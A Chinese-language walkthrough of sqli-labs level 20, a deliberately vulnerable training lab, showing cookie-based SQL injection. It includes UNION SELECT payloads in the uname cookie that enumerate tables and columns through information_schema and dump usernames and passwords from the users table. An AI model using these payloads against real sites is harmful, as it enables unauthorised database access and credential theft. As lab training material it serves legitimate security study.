sqli-labs(20)


0X01

試探一下 這是登錄成功的頁面

這里題目高速我們是基於cookie的注入

0X01抓包試探

這里登陸的時候有兩個包

我們要含有cookie的那個包

0X02試探判斷是否cookie存在注入

Cookie: uname=admin'

 

 報錯 那么應該是基於'的cookie注入 我們現在找到了 是cookie的注入 並且是’閉合 那么我們如何進行注入吶?

怎么知道原來的語句吶?這里有一點點思路了 構造后面一個數據一個數據的加 加在,后面

Cookie: uname=admin',1)#
Cookie: uname=admin',1,1)#
Cookie: uname=admin',1,1,1)#

似乎好像不行 那cookie是如何和數據庫進行交互的吶?

看了源碼 原來如此

你登錄成功 就會在數據庫存放cookiee的變量

然后以下每一次提交

 

 那我們第一次cookie正確提交 后面直接構造語句進行

 

 這里查詢cookie的語句是* 但是我們知道secruity這個里面有3個表 所以這里我們構造語句

Cookie: uname=1'  union select 1,2,database()#

這里不能填入你正確的cookie 如果你填入真確的那么他就不會顯示出你后面語句要查詢的結果 name 和password都會顯示成你正確的、

所以這里我們要填錯誤的cookie來進行注入

0X02爆表名 限制了輸出長度 這里用limit 繞過

Cookie: uname=ad'  union select 1,2,(select table_name from information_schema.tables where table_schema='security' limit 3,1)#

 

0X03組合拳打法

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

字段

1' union select 1,2,group_concat(concat_ws('-',id,username,password)) from users#

 

切記 學習之路 少就是多 慢就是快


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM